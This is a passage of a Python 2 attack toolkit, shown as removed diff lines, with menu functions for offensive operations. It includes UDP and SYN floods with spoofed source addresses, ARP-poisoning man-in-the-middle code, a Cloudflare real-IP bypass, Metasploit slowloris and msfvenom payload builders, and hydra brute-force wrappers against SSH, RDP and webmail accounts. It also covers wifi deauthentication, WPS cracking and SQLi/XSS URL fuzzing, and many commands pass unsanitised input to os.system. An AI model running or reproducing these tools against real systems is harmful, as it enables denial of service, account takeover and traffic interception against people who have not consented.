0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - 